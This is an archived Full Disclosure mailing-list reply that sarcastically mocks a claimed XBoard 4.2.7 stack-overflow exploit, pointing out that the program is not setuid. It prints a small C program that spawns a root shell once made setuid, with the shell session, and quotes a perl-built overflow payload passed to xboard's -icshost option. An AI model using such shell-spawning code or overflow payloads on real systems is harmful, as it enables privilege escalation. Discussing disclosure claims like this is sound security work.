Full Disclosure mailing list archives
Re: Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity!
From: d4rk <d4rk () securitylab ru>
Date: Tue, 2 Mar 2004 12:01:08 +0300
/** ** ! XBoard 4.2.7 UNPUBLISHED VULNERABLITY , 0hDAY ! *
Oh yeah, xplo for non-suid prog is real oday. I can show u one universal exploit code for ALL linux/x86 boxes! And u will not need to exploit bofs in non-suid binaries in future! This is real 0day! Do-not-distribute!#@&(*)$#@ Are u ready??! Here it is: ====zer0-day==== int main() { setreuid(0,0); execl("/bin/sh","sh",0); } =====end====== Let's check! # gcc -o zer0-day linux-own.c # su nobody sh: /root/.bashrc: Permission denied sh-2.05b$ id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) /* here we are waiting when somebody with root-access will make it suid. */ /* or if root is your friend, u can ask him to do it. */ /* or if root == you, just su (chown root.root if needed) and chmod +s */ /* or somehow it will be suid by default? but i dont think so.. */ /* anyway... */ sh-2.05b$ ./zer0-day sh-2.05b# id uid=0(root) gid=65534(nogroup) groups=65534(nogroup) sh-2.05b# Yea! We did it!!
narkotix@labs:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print "\x7e\xfd\xff\xbf"x166'` sh-2.05b# id uid=0(root) gid=100(users) groups=100(users) <-----on my box all of the programs r SUID :P just demonstrated.
As u c, on my box too =) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity! narko tix (Mar 01)
- Re: Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity! d4rk (Mar 02)
- Re: Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity! Valdis . Kletnieks (Mar 02)
- Re: Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity! d4rk (Mar 02)